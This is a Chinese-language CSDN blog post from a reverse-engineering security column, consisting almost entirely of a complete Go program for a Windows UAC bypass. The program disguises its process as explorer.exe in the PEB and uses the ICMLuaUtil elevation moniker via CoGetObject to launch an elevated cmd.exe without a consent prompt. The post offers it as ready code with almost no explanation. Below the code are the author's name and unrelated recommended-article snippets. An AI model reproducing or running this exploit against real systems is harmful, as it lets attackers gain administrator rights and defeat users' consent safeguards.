golang实现普通升管理员权限

最新推荐文章于 2024-05-30 16:29:47 发布
最新推荐文章于 2024-05-30 16:29:47 发布
阅读量451 收藏 5
点赞数 5
分类专栏: 64位逆向安全 文章标签: golang
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1309525802/article/details/138918376
版权

golang实现普通升管理员权限

package main

import (
	"fmt"
	"os"
	"path/filepath"
	"runtime"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
	"golang.org/x/sys/windows/registry"
)

var (
	modntdll = windows.NewLazySystemDLL("ntdll.dll")
	modole32 = windows.NewLazySystemDLL("ole32.dll")

	procRtlInitUnicodeString = modntdll.NewProc("RtlInitUnicodeString")
	procRtlGetCurrentPeb     = modntdll.NewProc("RtlGetCurrentPeb")
	procCoInitializeEx       = modole32.NewProc("CoInitializeEx")
	procCoUninitialize       = modole32.NewProc("CoUninitialize")
	procCoGetObject          = modole32.NewProc("CoGetObject")
)

type cBIND_OPTS3 struct {
	cbStruct            uint32
	grfFlags            uint32
	grfMode             uint32
	dwTickCountDeadline uint32
	dwTrackFlags        uint32
	dwClassContext      uint32
	locale              uint32
	pServerInfo         *uintptr
	hwnd                *uintptr
}

const (
	releaseOffset      = 2
	shellExecuteOffset = 9

	cSEE_MASK_DEFAULT = 0
)

type cUNICODE_STRING struct {
	Length        uint16
	MaximumLength uint16
	Buffer        *uint16
}

type cLIST_ENTRY struct {
	Flink *cLIST_ENTRY
	Blink *cLIST_ENTRY
}

/* The below three structs have several "reserved" members. These are of course well-known and extensively reverse-
 * engineered, but the below shows only the documented and therefore stable fields from Microsoft's winternl.h header */

type cLDR_DATA_TABLE_ENTRY struct {
	Reserved1          [2]uintptr
	InMemoryOrderLinks cLIST_ENTRY
	Reserved2          [2]uintptr
	DllBase            uintptr
	Reserved3          [2]uintptr
	FullDllName        cUNICODE_STRING
	Reserved4          [8]byte
	Reserved5          [3]uintptr
	Reserved6          uintptr
	TimeDateStamp      uint32
}

type cPEB_LDR_DATA struct {
	Reserved1               [8]byte
	Reserved2               [3]uintptr
	InMemoryOrderModuleList cLIST_ENTRY
}

type cPEB struct {
	Reserved1              [2]byte
	BeingDebugged          byte
	Reserved2              [1]byte
	Reserved3              uintptr
	ImageBaseAddress       uintptr
	Ldr                    *cPEB_LDR_DATA
	ProcessParameters      uintptr
	Reserved4              [3]uintptr
	AtlThunkSListPtr       uintptr
	Reserved5              uintptr
	Reserved6              uint32
	Reserved7              uintptr
	Reserved8              uint32
	AtlThunkSListPtr32     uint32
	Reserved9              [45]uintptr
	Reserved10             [96]byte
	PostProcessInitRoutine uintptr
	Reserved11             [128]byte
	Reserved12             [1]uintptr
	SessionId              uint32
}

const (
	// winuser.h
	SW_HIDE            = 0
	SW_NORMAL          = 1
	SW_SHOWNORMAL      = 1
	SW_SHOWMINIMIZED   = 2
	SW_SHOWMAXIMIZED   = 3
	SW_MAXIMIZE        = 3
	SW_SHOWNOACTIVATE  = 4
	SW_SHOW            = 5
	SW_MINIMIZE        = 6
	SW_SHOWMINNOACTIVE = 7
	SW_SHOWNA          = 8
	SW_RESTORE         = 9
	SW_SHOWDEFAULT     = 10
	SW_FORCEMINIMIZE   = 11
)
const (
	cCLSCTX_LOCAL_SERVER      = 4
	cCOINIT_APARTMENTTHREADED = 2
)

func rtlInitUnicodeString(destinationString *cUNICODE_STRING, sourceString *uint16) {
	syscall.Syscall(procRtlInitUnicodeString.Addr(), 2, uintptr(unsafe.Pointer(destinationString)), uintptr(unsafe.Pointer(sourceString)), 0)
	return
}
func rtlGetCurrentPeb() (peb *cPEB) {
	r0, _, _ := syscall.Syscall(procRtlGetCurrentPeb.Addr(), 0, 0, 0, 0)
	peb = (*cPEB)(unsafe.Pointer(r0))
	return
}
func coInitializeEx(reserved uintptr, coInit uint32) (ret error) {
	r0, _, _ := syscall.Syscall(procCoInitializeEx.Addr(), 2, uintptr(reserved), uintptr(coInit), 0)
	if r0 != 0 {
		ret = syscall.Errno(r0)
	}
	return
}
func coGetObject(name *uint16, bindOpts *cBIND_OPTS3, guid *windows.GUID, functionTable ***[0xffff]uintptr) (ret error) {
	r0, _, _ := syscall.Syscall6(procCoGetObject.Addr(), 4, uintptr(unsafe.Pointer(name)), uintptr(unsafe.Pointer(bindOpts)), uintptr(unsafe.Pointer(guid)), uintptr(unsafe.Pointer(functionTable)), 0, 0)
	if r0 != 0 {
		ret = syscall.Errno(r0)
	}
	return
}
func coUninitialize() {
	syscall.Syscall(procCoUninitialize.Addr(), 0, 0, 0, 0)
	return
}
func OpenCurrentProcessToken() (windows.Token, error) {
	p := windows.CurrentProcess()

	var t windows.Token
	e := windows.OpenProcessToken(p, windows.TOKEN_QUERY|windows.TOKEN_DUPLICATE, &t)
	if e != nil {
		return 0, e
	}
	return t, nil
}

// 检查是否为内置管理成员
func isAdmin(token windows.Token) bool {
	builtinAdminsGroup, err := windows.CreateWellKnownSid(windows.WinBuiltinAdministratorsSid)
	if err != nil {
		return false
	}
	var checkableToken windows.Token
	err = windows.DuplicateTokenEx(token, windows.TOKEN_QUERY|windows.TOKEN_IMPERSONATE, nil, windows.SecurityIdentification, windows.TokenImpersonation, &checkableToken)
	if err != nil {
		return false
	}
	defer checkableToken.Close()
	isAdmin, err := checkableToken.IsMember(builtinAdminsGroup)
	return isAdmin && err == nil
}
func TokenIsElevatedOrElevatable(token windows.Token) bool {
	if token.IsElevated() && isAdmin(token) {
		return true
	}
	linked, err := token.GetLinkedToken()
	if err != nil {
		return false
	}
	defer linked.Close()
	return linked.IsElevated() && isAdmin(linked)
}

func findCurrentDataTableEntry() (entry *cLDR_DATA_TABLE_ENTRY, err error) {
	peb := rtlGetCurrentPeb()
	if peb == nil || peb.Ldr == nil {
		err = windows.ERROR_INVALID_ADDRESS
		return
	}
	for cur := peb.Ldr.InMemoryOrderModuleList.Flink; cur != &peb.Ldr.InMemoryOrderModuleList; cur = cur.Flink {
		entry = (*cLDR_DATA_TABLE_ENTRY)(unsafe.Pointer(uintptr(unsafe.Pointer(cur)) - unsafe.Offsetof(cLDR_DATA_TABLE_ENTRY{}.InMemoryOrderLinks)))
		if entry.DllBase == peb.ImageBaseAddress {
			return
		}
	}
	entry = nil
	err = windows.ERROR_OBJECT_NOT_FOUND
	return
}
func main() {
	//获取进程Token

	processToken, err := OpenCurrentProcessToken() //TODO: Change to windows.OpenCurrentProcessToken once https://go-review.googlesource.com/c/sys/+/192337 lands
	if err != nil {
		return
	}
	defer processToken.Close()
	// //判断当前进程是否可以升权
	if processToken.IsElevated() {
		fmt.Println("你已经是管理员!!")
		return
	}
	if !TokenIsElevatedOrElevatable(processToken) {
		fmt.Println("你已经是管理员!!")
		err = windows.ERROR_ACCESS_DENIED
		return
	}
	//检查UAC是否开启
	key, err := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", registry.QUERY_VALUE)
	if err != nil {
		return
	}
	promptBehavior, _, err := key.GetIntegerValue("ConsentPromptBehaviorAdmin")
	key.Close()
	if err != nil {
		return
	}
	if uint32(promptBehavior) == 0 {
		fmt.Println("关闭了UAC")
		err = windows.ERROR_SUCCESS
		return
	}
	if uint32(promptBehavior) != 5 {
		fmt.Println("UAC权限太高无法提权")
		err = windows.ERROR_ACCESS_DENIED
		return
	}
	key, err = registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\UAC\\COMAutoApprovalList", registry.QUERY_VALUE)
	if err == nil {
		var autoApproved uint64
		autoApproved, _, err = key.GetIntegerValue("{3E5FC7F9-9A51-4367-9063-A120244FBEC7}")
		key.Close()
		if err != nil {
			return
		}
		if uint32(autoApproved) == 0 {
			err = windows.ERROR_ACCESS_DENIED
			return
		}
	}
	dataTableEntry, err := findCurrentDataTableEntry()
	if err != nil {
		return
	}
	windowsDirectory, err := windows.GetSystemWindowsDirectory()
	if err != nil {
		fmt.Println("err", err)
		return
	}
	originalPath := dataTableEntry.FullDllName.Buffer
	explorerPath := windows.StringToUTF16Ptr(filepath.Join(windowsDirectory, "explorer.exe"))
	rtlInitUnicodeString(&dataTableEntry.FullDllName, explorerPath)
	defer func() {
		rtlInitUnicodeString(&dataTableEntry.FullDllName, originalPath)
		runtime.KeepAlive(explorerPath)
	}()

	if err = coInitializeEx(0, cCOINIT_APARTMENTTHREADED); err == nil {
		defer coUninitialize()
	}

	var interfacePointer **[0xffff]uintptr
	//使用CoGetObject方法获取ICMLuaUtil接口的实例
	if err = coGetObject(
		windows.StringToUTF16Ptr("Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"),
		&cBIND_OPTS3{
			cbStruct:       uint32(unsafe.Sizeof(cBIND_OPTS3{})),
			dwClassContext: cCLSCTX_LOCAL_SERVER,
		},
		&windows.GUID{0x6EDD6D74, 0xC007, 0x4E75, [8]byte{0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C}},
		&interfacePointer,
	); err != nil {
		return
	}
	exePath, _ := windows.UTF16PtrFromString("cmd.exe")
	arguments, _ := windows.UTF16PtrFromString("")
	pwd, _ := os.Getwd()
	workDir, _ := windows.UTF16PtrFromString(pwd)
	defer syscall.Syscall((*interfacePointer)[releaseOffset], 1, uintptr(unsafe.Pointer(interfacePointer)), 0, 0)
	if ret, _, _ := syscall.Syscall6((*interfacePointer)[shellExecuteOffset], 6,
		uintptr(unsafe.Pointer(interfacePointer)),
		uintptr(unsafe.Pointer(exePath)),
		uintptr(unsafe.Pointer(arguments)),
		uintptr(unsafe.Pointer(workDir)),
		cSEE_MASK_DEFAULT,
		uintptr(SW_SHOW),
	); ret != uintptr(windows.ERROR_SUCCESS) {
		err = syscall.Errno(ret)
		return
	}

	err = nil
}
山与路
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSDN前1000名博主
无知人生,记录点滴
05-26 7万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10stpeace的专栏中国本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:5286 粉丝:10660 积分:170616 等级:10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名:3 原创:162...
使用mono-repo实现跨项目组件共享
dennis_jiang的博客
01-04 944
本文会分享一个我在实际工作中遇到的案例,从最开始的需求分析到项目搭建,以及最后落地的架构的整个过程。最终实现的效果是使用mono-repo实现了跨项目的组件共享。在本文中你可以看到: 从接到需求到深入分析并构建架构的整个思考过程。 mono-repo的简单介绍。 mono-repo适用的场景分析。 产出一个可以跨项目共享组件的项目架构。 本文产出的架构模板已经上传到GitHub,如果你刚好需要一个mono-repo + react的模板,直接clone下来吧:https://github.com/den
循环鼠标自动点击功能- Golang实现
04-10
循环鼠标自动点击功能--- Golang实现 有代码和可执行程序。
golang大厂面试2
niwoxiangyu的博客
07-04 1143
一开始一个项目数据比较多,后来需要分库分表,有什么思路在不停服务的情况下做到平滑切换?wss是基于tcp的,tcp有个半连接队列,有没有遇到发了信令但是服务器没收到的情况?实现一个函数,有两个参数分别是序的整数数组a和b,返回合并后的序整数数组。理解不理解这些树的构造,是要解决什么问题?处理日志的时候如果发现突然量变大,该如何扩容让以前堆积的日志可以消耗掉?命令的时间差如何保证,命令混乱了怎么办(时间戳记录在服务器可以吗?题拍拍主要做拍搜服务的,题拍拍主要做增长,后面会做微服务架构k8s等。
详细讲解一下Linux内核系统结构(图例解析)
csbmww的博客
04-09 2786
Linux系统一般有4个主要部分: 内核、shell、文件系统和应用程序。内核、shell和文件系统一起形成了基本的操作系统结构,它们使得用户可以运行程序、管理文件并使用系统。部分层次结构如图1-1所示。 一、linux内核 内核是操作系统的核心,具有很多最基本功能,它负责管理系统的进程、内存、设备驱动程序、文件和网络系统,决定着系统的性能和稳定性。 Linux 内核由如下几部分组成:内存管理、进程管理、设备驱动程序、文件系统和网络管理等。如图: 图1 系统调用接口:SCI 层提供了某些
推荐CSDN排名前1000博主
热门推荐
赵英超的博客
08-05 5万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10 stpeace的专栏 中国 本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:52...
redis cluster 集群 HA 原理和实操(史上最全、面试必备)
架构师尼恩
03-19 7334
文章很长,建议收藏起来慢慢读!疯狂创客圈总目录 语雀版 | 总目录 码云版| 总目录 博客园版 为您奉上珍贵的学习资源 : 免费赠送 经典图书:《Java高并发核心编程(卷1)》 面试必备 + 大厂必备 +涨薪必备 加尼恩免费领 免费赠送 经典图书:《Java高并发核心编程(卷2)》 面试必备 + 大厂必备 +涨薪必备 加尼恩免费领 免费赠送 经典图书:《Netty Zookeeper Redis 高并发实战》 面试必备 + 大厂必备 +涨薪必备 加尼恩免费领 免费赠送 经典图书:《
Docker之旅(1)-Docker基础
Blog of Stevenux
02-18 2340
一.Docker 简介 1.1 Docker 概念 Docker 于 2013 年开源,其基于 go 语言开发,是一个开源的 PaaS 服务(Platform as a Service,平台即服务的缩写)。而 go 语言由 google 开发,docker 公司最早期 叫 dotCloud。Docker 开源后广受欢迎,于是公司改名为 Docker Inc,总部位于美国 加州旧金山,Docker ...
Linux C++后端开发学习路线参考汇总
xmcy001122的专栏
06-23 4220
文章目录Linux C++后端开发学习路线参考汇总如何快速掌握C++?路线一(<6个月):知乎Milo Yip路线二(<1年):华中大守门员一、C++基础(3个月)二、计算机网络(1个月)三、操作系统(1个月)四、网络编程(1个月)五、数据结构与[算法]()及[刷题]()(2个月)六、mySQL数据库(7天~15天)七、[项目]()(2个月)总结路线三(<3年):编程指北正文一、后端/后台/服务器开发?二、后台开发都考察哪些?三、C/C++四、操作系统五、计算机网络六、网络编程七、系统级编
Golang之casbin权限管理的实现
12-16
1. 权限管理 Casbin是用于Golang项目的功能强大且高效的开源访问控制库。 1.1.1. 特征 Casbin的作用: 以经典{subject, object, action}形式或您定义的自定义形式实施策略,同时支持允许和拒绝授权。 处理访问控制...
golang win7/win8 获取管理员权限
11-02
golang win7/win8 获取系统权限
golang实现海康相机抓拍demo
04-30
golang 实现海康相机抓拍,目前只支持球机。需要在代码中设置用户名和密码。 如何调试?用vscode打开,安装golang插件,即可直接调试运行。 编译与运行:运行go build命令,将HKnet.exe拷贝到build\Windows下,运行...
golang struct 实现 interface的方法
09-20
主要介绍了golang struct 实现 interface的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
长安链使用Golang编写智能合约教程(三)
目前专注区块链相关技术的学习与分享
05-29 805
长安链使用Golang编写智能合约教程 SDK详细解析
6.2 Go 切片(Slice)
stormsha
05-29 1070
Go 语言以其简洁、高效和并发友好的特性,赢得了开发者的青睐。在 Go 中,切片(Slice)是一种动态数组,它不仅提供了数组的便利性,还具有灵活性和强大的功能。对于中高级开发者来说,掌握 Go 切片的使用技巧,可以大幅提编程效率和程序性能。本文将深入探讨 Go 切片的高级使用技巧,帮助开发者更深入地理解和运用这一强大的数据结构。
深入了解 Golang 多架构编译:交叉编译最佳实践
xcbeyond|疯狂源自梦想,技术成就辉煌
05-26 808
通过这篇文章,读者可以全面了解 Golang 的多架构编译功能,掌握如何使用这一功能来实现跨平台部署。同时,通过最佳实践示例,读者可以更加直观地理解 Golang 多架构编译的实际应用场景,为日后的开发工作提供参考和指导。
golang开发 gorilla websocket的使用
最新发布
飞翔码农的博客
05-30 867
我们使用二进制数据流,自定义的协议是这样的,先是无符号的 uint 占4个字节,表示行为逻辑,比如111-获取信息, 110- 加好友等等后面是具体的数据,跟HTTP请求的GET或者POST参数类似,具体数据格式定义好就行,比如可以使用JSON数据、可以使用RPC定义好的数据格式修改完之后 client.go 代码是这样的for {select {returnbinary.Write(buf, binary.BigEndian, []byte("我们都好"))if err!= nil {
6.4 Go 映射(Map)
stormsha
05-30 785
Go的映射是一个非常强大的工具,通过掌握其高级使用技巧,开发者可以更有效地解决各种编程问题。从基本的初始化和遍历,到更高级的并发控制和性能优化,映射在Go语言中的应用广泛且深入。
golang实现一套权限管理系统
02-22
使用Golang实现一套权限管理系统可以通过定义相应的接口和实现相应的功能来实现。可以使用Golang的标准库来实现访问控制,以及管理用户访问权限和资源的访问权限。同时,可以使用Golang的第三方库来实现更多的功能,如授权、认证、会话管理等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值